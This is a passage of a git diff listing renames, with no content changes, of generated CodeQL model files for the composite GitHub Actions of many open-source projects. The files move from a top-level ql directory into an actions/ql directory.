actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml rename to actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml rename to actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml rename to actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml rename to actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml rename to actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml rename to actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml rename to actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml rename to actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml rename to actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml rename to actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml rename to actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml rename to actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nektos_act.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml rename to actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml rename to actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml rename to actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml rename to actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml rename to actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml rename to actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml rename to actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml rename to actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml rename to actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml rename to actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml rename to actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml rename to actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml rename to actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml rename to actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml rename to actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml rename to actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml rename to actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/oracle_graal.model.yml rename to actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml rename to actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml rename to actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml rename to actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/owntracks_android.model.yml rename to actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml rename to actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml rename to actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/php_php-src.model.yml rename to actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml rename to actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/primer_react.model.yml rename to actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml rename to actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml rename to actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/psf_black.model.yml rename to actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml rename to actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml rename to actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/python_mypy.model.yml rename to actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml rename to actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/quay_clair.model.yml rename to actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml rename to actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/randombit_botan.model.yml rename to actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml rename to actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml rename to actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml rename to actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml rename to actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rook_rook.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/roots_trellis.model.yml rename to actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ruby_debug.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml rename to actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml rename to actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/saltstack_salt.yml rename to actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml rename to actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/scitools_iris.model.yml rename to actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml diff --git 